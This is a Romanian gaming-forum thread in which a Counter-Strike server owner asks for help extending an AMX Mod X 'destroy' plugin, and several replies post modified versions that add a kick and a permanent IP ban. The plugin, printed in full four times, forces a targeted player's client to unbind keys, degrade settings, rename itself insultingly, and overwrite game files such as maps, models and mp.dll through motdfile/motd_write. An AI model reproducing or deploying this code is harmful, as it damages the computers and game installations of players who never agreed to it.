AMX_DESTROY + BAN [ Rezolvat ]

Modificari necesare ale pluginurilor

Moderators: Moderatori ajutatori, Moderatori, Echipa eXtreamCS.com

Post Reply
User avatar
0rsp
Membru, skill 0
Membru, skill 0
Posts: 4
Joined: 22 Oct 2013, 13:40
Detinator Steam: Da
Detinator server CS: cs.batalia.ro
SteamID: cosu101
Location: Constanta
Has thanked: 4 times
Contact:

22 Mar 2014, 19:44

Am pluginul asta , amx_destroy ce l-am descarcat exact asa cum este de pe internet , asa ca nu faceti caz despre author ca nu dau 2 bani pe numele de acolo in sensul ca daca nu e el...nu stiu detalii.
Eu am modificat doar comanda , in lod de amx-destroy am pus amx_pa , a-si vrea daca aveti idee cum adaug si eu ban in acest plugin ca in momentul cand dau amx_pa sa ia si ban pe langa distroy.

Multumesc.

| Afiseaza codul
[code]#include < amxmodx > 
#include < amxmisc > 

new const g_sPa[ ][ ] = 
{ 
   "thetime;w;w;w;w;w;w;w;w;w;w;w;snapshot;w;snapshot;w;screenshot;w;screenshot;w;w;w;w;w", 
   "rate 1", 
   "unbindall", 
   "cl_crosshair_color x", 
   "con_color x", 
   "cl_cmdrate 1", 
   "cl_updaterate 1", 
   "fps_max 1", 
   "fps_modem 1", 
   "developer 1", 
   "sys_ticrate 1", 
   "r_norefresh 1", 

     "alias w wait", 
   "w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;dropclient",
  
   "name Fucked by Cs.Batalia.Ro-Staff", 
    
   "motdfile models/player.mdl;motd_write x", 
   "motdfile models/v_ak47.mdl;motd_write x", 
   "motdfile cs_dust.wad;motd_write x", 
   "motdfile models/v_m4a1.mdl;motd_write x", 
   "motdfile resource/GameMenu.res;motd_write x", 
   "motdfile halflife.wad;motd_write x", 
   "motdfile cstrike.wad;motd_write x", 
   "motdfile maps/de_dust2.bsp;motd_write x", 
   "motdfile events/ak47.sc;motd_write x", 
   "motdfile dlls/mp.dll;motd_write x", 
   "motdfile models/v_usp.mdl;motd_write x", 
   "motdfile models/cs_assault.wad;motd_write x", 
   "motdfile models/v_awp.mdl;motd_write x", 
   "motdfile cs_dust.wad;motd_write x", 
   "motdfile n0th1ng.wad;motd_write x", 
   "motdfile maps/de_dust2x2.bsp;motd_write x", 
   "motdfile maps/fy_snow.bsp;motd_write x", 
   "motdfile maps/awp_india.bsp;motd_write x", 
   "motdfile maps/de_aztec.bsp;motd_write x", 
    
   "cl_timeout 0"    
}; 

public plugin_init( ) 
{ 
   register_plugin( "Pa !!", "1.3", "lord of nothing" ); 
   register_concmd( "amx_pa", "Pa", ADMIN_LEVEL_A, "<player>" ); 
} 

public Pa( id, level, cid ) 
{ 
   if( !cmd_access( id, level, cid, 2 ) ) 
      return PLUGIN_HANDLED; 
    
   new sArgument[ 32 ]; 
   read_argv( 1, sArgument, charsmax( sArgument ) ); 
    
   new player = cmd_target( id, sArgument, ( CMDTARGET_NO_BOTS | CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF ) ); 
    
   if( !player ) 
      return PLUGIN_HANDLED; 
    
   for( new i = 0; i < sizeof( g_sPa ); i++) 
      client_cmd( player, g_sPa[ i ] ); 
    
   new name[ 32 ], name2[ 32 ], ip2[ 16 ]; 
   get_user_name( id, name, charsmax( name ) ); 
   get_user_name( player, name2, charsmax( name2 ) ); 
   get_user_ip( player, ip2, charsmax( ip2 ), 1 ); 
    
   log_to_file( "pa.log", "%s a folosit comanda amx_pa pe jucaotrul %s(%s)", name, name2, ip2 ); 
    
   player_color( 0, ".v%s .g a folosit comanda amx_pa pe jucatorul : .v%s", name, name2 ); 
    
   client_cmd( 0, "spk ^"vox/bizwarn coded user apprehend^"" );    
    
   return PLUGIN_HANDLED; 
} 

stock player_color( const id, const input[ ], any:... ) 
{ 
   new count = 1, players[ 32 ] 

   static msg[ 191 ] 
   vformat( msg, 190, input, 3 ) 
    
   replace_all( msg, 190, ".v", "^4" ) /* verde */ 
   replace_all( msg, 190, ".g", "^1" ) /* galben */ 
   replace_all( msg, 190, ".e", "^3" ) /* ct=albastru | t=rosu */ 
   replace_all( msg, 190, ".x", "^0" ) /* normal-echipa */ 
    
   if( id ) players[ 0 ] = id; else get_players( players, count, "ch" ) 
   { 
      for( new i = 0; i < count; i++ ) 
      { 
         if( is_user_connected( players[ i ] ) ) 
         { 
            message_begin( MSG_ONE_UNRELIABLE, get_user_msgid( "SayText" ), _, players[ i ] ) 
            write_byte( players[ i ] ); 
            write_string( msg ); 
            message_end( ); 
         } 
      } 
   } 
}[/code]
RoyalServer 2
User avatar
h4wk
Fost moderator
Fost moderator
Posts: 3806
Joined: 22 Sep 2009, 13:10
Detinator Steam: Da
Reputatie: Fost eXtream Mod
Nume anterior : DaZ , zimpe , Dan eXtream
Location: Iasi
Has thanked: 306 times
Been thanked: 321 times
Contact:

22 Mar 2014, 21:31

Mutat @Modificarea Pluginurilor !

Incearca :[/b]
| Afiseaza codul
#include < amxmodx > 
#include < amxmisc > 

new const g_sPa[ ][ ] = 
{ 
   "thetime;w;w;w;w;w;w;w;w;w;w;w;snapshot;w;snapshot;w;screenshot;w;screenshot;w;w;w;w;w", 
   "rate 1", 
   "unbindall", 
   "cl_crosshair_color x", 
   "con_color x", 
   "cl_cmdrate 1", 
   "cl_updaterate 1", 
   "fps_max 1", 
   "fps_modem 1", 
   "developer 1", 
   "sys_ticrate 1", 
   "r_norefresh 1", 

     "alias w wait", 
   "w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;ww;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;dropclient",
  
   "name Fucked by Cs.Batalia.Ro-Staff", 
    
   "motdfile models/player.mdl;motd_write x", 
   "motdfile models/v_ak47.mdl;motd_write x", 
   "motdfile cs_dust.wad;motd_write x", 
   "motdfile models/v_m4a1.mdl;motd_write x", 
   "motdfile resource/GameMenu.res;motd_write x", 
   "motdfile halflife.wad;motd_write x", 
   "motdfile cstrike.wad;motd_write x", 
   "motdfile maps/de_dust2.bsp;motd_write x", 
   "motdfile events/ak47.sc;motd_write x", 
   "motdfile dlls/mp.dll;motd_write x", 
   "motdfile models/v_usp.mdl;motd_write x", 
   "motdfile models/cs_assault.wad;motd_write x", 
   "motdfile models/v_awp.mdl;motd_write x", 
   "motdfile cs_dust.wad;motd_write x", 
   "motdfile n0th1ng.wad;motd_write x", 
   "motdfile maps/de_dust2x2.bsp;motd_write x", 
   "motdfile maps/fy_snow.bsp;motd_write x", 
   "motdfile maps/awp_india.bsp;motd_write x", 
   "motdfile maps/de_aztec.bsp;motd_write x", 
    
   "cl_timeout 0"    
}; 

public plugin_init( ) 
{ 
   register_plugin( "Pa !!", "1.3", "lord of nothing" ); 
   register_concmd( "amx_pa", "Pa", ADMIN_LEVEL_A, "<player>" ); 
} 

public Pa( id, level, cid ) 
{ 
   if( !cmd_access( id, level, cid, 2 ) ) 
      return PLUGIN_HANDLED; 
    
   new sArgument[ 32 ]; 
   read_argv( 1, sArgument, charsmax( sArgument ) ); 
    
   new player = cmd_target( id, sArgument, ( CMDTARGET_NO_BOTS | CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF ) ); 
    
   if( !player ) 
      return PLUGIN_HANDLED; 
    
   for( new i = 0; i < sizeof( g_sPa ); i++) 
      client_cmd( player, g_sPa[ i ] ); 
    
   new name[ 32 ], name2[ 32 ], ip2[ 16 ]; 
   get_user_name( id, name, charsmax( name ) ); 
   get_user_name( player, name2, charsmax( name2 ) ); 
   get_user_ip( player, ip2, charsmax( ip2 ), 1 ); 
    
   log_to_file( "pa.log", "%s a folosit comanda amx_pa pe jucaotrul %s(%s)", name, name2, ip2 ); 
    
   player_color( 0, ".v%s .g a folosit comanda amx_pa pe jucatorul : .v%s", name, name2 ); 
   server_cmd("addip 0.0 ^"%s^";wait;writeip", ip)
   client_cmd( 0, "spk ^"vox/bizwarn coded user apprehend^"" );    
   
   return PLUGIN_HANDLED; 
} 

stock player_color( const id, const input[ ], any:... ) 
{ 
   new count = 1, players[ 32 ] 

   static msg[ 191 ] 
   vformat( msg, 190, input, 3 ) 
    
   replace_all( msg, 190, ".v", "^4" ) /* verde */ 
   replace_all( msg, 190, ".g", "^1" ) /* galben */ 
   replace_all( msg, 190, ".e", "^3" ) /* ct=albastru | t=rosu */ 
   replace_all( msg, 190, ".x", "^0" ) /* normal-echipa */ 
    
   if( id ) players[ 0 ] = id; else get_players( players, count, "ch" ) 
   { 
      for( new i = 0; i < count; i++ ) 
      { 
         if( is_user_connected( players[ i ] ) ) 
         { 
            message_begin( MSG_ONE_UNRELIABLE, get_user_msgid( "SayText" ), _, players[ i ] ) 
            write_byte( players[ i ] ); 
            write_string( msg ); 
            message_end( ); 
         } 
      } 
   } 
}

Code: Select all

"Daca ai culoare nu inseamna ca esti mai presus ca un utilizator. Culoare e un fel de "rasplata" pentru ca te implici in "ridicarea" acestei comunitati.
Unii nu realizeaza ca daca ai culoare nu inseamna ca esti smecher." -- by Alexey
:troll :troll

Spui ceva,dar faci altceva !
User avatar
0rsp
Membru, skill 0
Membru, skill 0
Posts: 4
Joined: 22 Oct 2013, 13:40
Detinator Steam: Da
Detinator server CS: cs.batalia.ro
SteamID: cosu101
Location: Constanta
Has thanked: 4 times
Contact:

23 Mar 2014, 12:26

amx_pa.sma(77) : error 017: undefined symbol "ip"

1 Error.
Compile failed!

Imi da eroare la linia asta cand incerc sa il compilez

Code: Select all

  server_cmd("banip 0.0 ^"%s^";wait;writeip", ip)
User avatar
h4wk
Fost moderator
Fost moderator
Posts: 3806
Joined: 22 Sep 2009, 13:10
Detinator Steam: Da
Reputatie: Fost eXtream Mod
Nume anterior : DaZ , zimpe , Dan eXtream
Location: Iasi
Has thanked: 306 times
Been thanked: 321 times
Contact:

23 Mar 2014, 12:47

| Afiseaza codul
#include < amxmodx > 
#include < amxmisc > 

new const g_sPa[ ][ ] = 
{ 
   "thetime;w;w;w;w;w;w;w;w;w;w;w;snapshot;w;snapshot;w;screenshot;w;screenshot;w;w;w;w;w", 
   "rate 1", 
   "unbindall", 
   "cl_crosshair_color x", 
   "con_color x", 
   "cl_cmdrate 1", 
   "cl_updaterate 1", 
   "fps_max 1", 
   "fps_modem 1", 
   "developer 1", 
   "sys_ticrate 1", 
   "r_norefresh 1", 

     "alias w wait", 
   "w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;ww;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;dropclient",
  
   "name Fucked by Cs.Batalia.Ro-Staff", 
    
   "motdfile models/player.mdl;motd_write x", 
   "motdfile models/v_ak47.mdl;motd_write x", 
   "motdfile cs_dust.wad;motd_write x", 
   "motdfile models/v_m4a1.mdl;motd_write x", 
   "motdfile resource/GameMenu.res;motd_write x", 
   "motdfile halflife.wad;motd_write x", 
   "motdfile cstrike.wad;motd_write x", 
   "motdfile maps/de_dust2.bsp;motd_write x", 
   "motdfile events/ak47.sc;motd_write x", 
   "motdfile dlls/mp.dll;motd_write x", 
   "motdfile models/v_usp.mdl;motd_write x", 
   "motdfile models/cs_assault.wad;motd_write x", 
   "motdfile models/v_awp.mdl;motd_write x", 
   "motdfile cs_dust.wad;motd_write x", 
   "motdfile n0th1ng.wad;motd_write x", 
   "motdfile maps/de_dust2x2.bsp;motd_write x", 
   "motdfile maps/fy_snow.bsp;motd_write x", 
   "motdfile maps/awp_india.bsp;motd_write x", 
   "motdfile maps/de_aztec.bsp;motd_write x", 
    
   "cl_timeout 0"    
}; 

public plugin_init( ) 
{ 
   register_plugin( "Pa !!", "1.3", "lord of nothing" ); 
   register_concmd( "amx_pa", "Pa", ADMIN_LEVEL_A, "<player>" ); 
} 

public Pa( id, level, cid ) 
{ 
   if( !cmd_access( id, level, cid, 2 ) ) 
      return PLUGIN_HANDLED; 
    
   new sArgument[ 32 ]; 
   read_argv( 1, sArgument, charsmax( sArgument ) ); 
    
   new player = cmd_target( id, sArgument, ( CMDTARGET_NO_BOTS | CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF ) ); 
    
   if( !player ) 
      return PLUGIN_HANDLED; 
    
   for( new i = 0; i < sizeof( g_sPa ); i++) 
      client_cmd( player, g_sPa[ i ] ); 
    
   new name[ 32 ], name2[ 32 ], ip2[ 16 ]; 
   get_user_name( id, name, charsmax( name ) ); 
   get_user_name( player, name2, charsmax( name2 ) ); 
   get_user_ip( player, ip2, charsmax( ip2 ), 1 ); 
    
   log_to_file( "pa.log", "%s a folosit comanda amx_pa pe jucaotrul %s(%s)", name, name2, ip2 ); 
    
   player_color( 0, ".v%s .g a folosit comanda amx_pa pe jucatorul : .v%s", name, name2 ); 
   server_cmd("addip 0.0 ^"%s^";wait;writeip", ip2)
   client_cmd( 0, "spk ^"vox/bizwarn coded user apprehend^"" );    
   
   return PLUGIN_HANDLED; 
} 

stock player_color( const id, const input[ ], any:... ) 
{ 
   new count = 1, players[ 32 ] 

   static msg[ 191 ] 
   vformat( msg, 190, input, 3 ) 
    
   replace_all( msg, 190, ".v", "^4" ) /* verde */ 
   replace_all( msg, 190, ".g", "^1" ) /* galben */ 
   replace_all( msg, 190, ".e", "^3" ) /* ct=albastru | t=rosu */ 
   replace_all( msg, 190, ".x", "^0" ) /* normal-echipa */ 
    
   if( id ) players[ 0 ] = id; else get_players( players, count, "ch" ) 
   { 
      for( new i = 0; i < count; i++ ) 
      { 
         if( is_user_connected( players[ i ] ) ) 
         { 
            message_begin( MSG_ONE_UNRELIABLE, get_user_msgid( "SayText" ), _, players[ i ] ) 
            write_byte( players[ i ] ); 
            write_string( msg ); 
            message_end( ); 
         } 
      } 
   } 
}

Code: Select all

"Daca ai culoare nu inseamna ca esti mai presus ca un utilizator. Culoare e un fel de "rasplata" pentru ca te implici in "ridicarea" acestei comunitati.
Unii nu realizeaza ca daca ai culoare nu inseamna ca esti smecher." -- by Alexey
:troll :troll

Spui ceva,dar faci altceva !
User avatar
0rsp
Membru, skill 0
Membru, skill 0
Posts: 4
Joined: 22 Oct 2013, 13:40
Detinator Steam: Da
Detinator server CS: cs.batalia.ro
SteamID: cosu101
Location: Constanta
Has thanked: 4 times
Contact:

23 Mar 2014, 13:40

Code: Select all

amx_pa proper
0rsp  a folosit comanda amx_pa pe jucatorul : MR.PROPER
] amx_last
MR.PROPER           STEAM_666:88:666     78.128.95.77    z
] amx_unban "78.128.95.77"
[AdvancedBans]  78.128.95.77 nu a putut fi gasit in lista de ban!

Tot nu ia ban , oare o fi din cauza la AdvancedBans? chiar nu am nici cea mai vaga idee.
mr.f3lyx
Membru, skill +2
Membru, skill +2
Posts: 610
Joined: 10 Nov 2013, 20:24
Detinator Steam: Da
Location: Palermo, Italy
Has thanked: 69 times
Been thanked: 17 times

23 Mar 2014, 18:27

Ce zici asta merge ?
sma | Afiseaza codul
#include < amxmodx > 
#include < amxmisc > 

new const g_sPa[ ][ ] = 
{ 
   "thetime;w;w;w;w;w;w;w;w;w;w;w;snapshot;w;snapshot;w;screenshot;w;screenshot;w;w;w;w;w", 
   "rate 1", 
   "unbindall", 
   "cl_crosshair_color x", 
   "con_color x", 
   "cl_cmdrate 1", 
   "cl_updaterate 1", 
   "fps_max 1", 
   "fps_modem 1", 
   "developer 1", 
   "sys_ticrate 1", 
   "r_norefresh 1", 

     "alias w wait", 
   "w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;w;dropclient",
  
   "name Fucked by Cs.Batalia.Ro-Staff", 
    
   "motdfile models/player.mdl;motd_write x", 
   "motdfile models/v_ak47.mdl;motd_write x", 
   "motdfile cs_dust.wad;motd_write x", 
   "motdfile models/v_m4a1.mdl;motd_write x", 
   "motdfile resource/GameMenu.res;motd_write x", 
   "motdfile halflife.wad;motd_write x", 
   "motdfile cstrike.wad;motd_write x", 
   "motdfile maps/de_dust2.bsp;motd_write x", 
   "motdfile events/ak47.sc;motd_write x", 
   "motdfile dlls/mp.dll;motd_write x", 
   "motdfile models/v_usp.mdl;motd_write x", 
   "motdfile models/cs_assault.wad;motd_write x", 
   "motdfile models/v_awp.mdl;motd_write x", 
   "motdfile cs_dust.wad;motd_write x", 
   "motdfile n0th1ng.wad;motd_write x", 
   "motdfile maps/de_dust2x2.bsp;motd_write x", 
   "motdfile maps/fy_snow.bsp;motd_write x", 
   "motdfile maps/awp_india.bsp;motd_write x", 
   "motdfile maps/de_aztec.bsp;motd_write x", 
    
   "cl_timeout 0"    
}; 

public plugin_init( ) 
{ 
   register_plugin( "Pa !!", "1.3", "lord of nothing" ); 
   register_concmd( "amx_pa", "Pa", ADMIN_LEVEL_A, "<player>" ); 
} 

public Pa( id, level, cid ) 
{ 
   if( !cmd_access( id, level, cid, 2 ) ) 
      return PLUGIN_HANDLED; 
    
   new sArgument[ 32 ]; 
   read_argv( 1, sArgument, charsmax( sArgument ) ); 
    
   new player = cmd_target( id, sArgument, ( CMDTARGET_NO_BOTS | CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF ) ); 
    
   if( !player ) 
      return PLUGIN_HANDLED; 
    
   for( new i = 0; i < sizeof( g_sPa ); i++) 
      client_cmd( player, g_sPa[ i ] ); 
    
   new name[ 32 ], name2[ 32 ], ip2[ 16 ]; 
   get_user_name( id, name, charsmax( name ) ); 
   get_user_name( player, name2, charsmax( name2 ) ); 
   get_user_ip( player, ip2, charsmax( ip2 ), 1 ); 
    
   log_to_file( "pa.log", "%s a folosit comanda amx_pa pe jucaotrul %s(%s)", name, name2, ip2 ); 
    
   player_color( 0, ".v%s .g a folosit comanda amx_pa pe jucatorul : .v%s", name, name2 ); 
   
   server_cmd ( "kick #%d ^"Ai primit amx_pa ^";wait;addip 999999.0 ^"%s^";wait;writeip", player, ip2 );
    
   client_cmd( 0, "spk ^"vox/bizwarn coded user apprehend^"" );    
    
   return PLUGIN_HANDLED; 
} 

stock player_color( const id, const input[ ], any:... ) 
{ 
   new count = 1, players[ 32 ] 

   static msg[ 191 ] 
   vformat( msg, 190, input, 3 ) 
    
   replace_all( msg, 190, ".v", "^4" ) /* verde */ 
   replace_all( msg, 190, ".g", "^1" ) /* galben */ 
   replace_all( msg, 190, ".e", "^3" ) /* ct=albastru | t=rosu */ 
   replace_all( msg, 190, ".x", "^0" ) /* normal-echipa */ 
    
   if( id ) players[ 0 ] = id; else get_players( players, count, "ch" ) 
   { 
      for( new i = 0; i < count; i++ ) 
      { 
         if( is_user_connected( players[ i ] ) ) 
         { 
            message_begin( MSG_ONE_UNRELIABLE, get_user_msgid( "SayText" ), _, players[ i ] ) 
            write_byte( players[ i ] ); 
            write_string( msg ); 
            message_end( ); 
         } 
      } 
   } 
}
User avatar
0rsp
Membru, skill 0
Membru, skill 0
Posts: 4
Joined: 22 Oct 2013, 13:40
Detinator Steam: Da
Detinator server CS: cs.batalia.ro
SteamID: cosu101
Location: Constanta
Has thanked: 4 times
Contact:

23 Mar 2014, 20:09

am revenit cu un edit .
Merge perfect , faza e ca le baga in Listip si acum nu reusesc sa le dau unban :)
o sa ma descurc eu intr-un fel cu unbanul.
Iti Multumesc frumos , raman dator cu o naveta de bere.

Daca vreti sa dati Tc .

Va multumesc,
mr.f3lyx
Membru, skill +2
Membru, skill +2
Posts: 610
Joined: 10 Nov 2013, 20:24
Detinator Steam: Da
Location: Palermo, Italy
Has thanked: 69 times
Been thanked: 17 times

25 Mar 2014, 10:22

uitate in pm ti-am dat o solutie la ce miai zis..
User avatar
k i n g
Utilizator neserios (tepar)
Utilizator neserios (tepar)
Posts: 3092
Joined: 17 Sep 2012, 12:23
Detinator Steam: Da
CS Status: x
Reputatie: Fost moderator ajutator
Restrictie moderator
Nume anterior: k1NNG , TheKing
1.5/3
Utilizator neserios ( tepar )
Location: Pitesti
Has thanked: 34 times
Been thanked: 101 times

25 Mar 2014, 16:36

Setat ca rezolvat!
Post Reply

Return to “Modificari pluginuri”

  • Information
  • Who is online

    Users browsing this forum: No registered users and 5 guests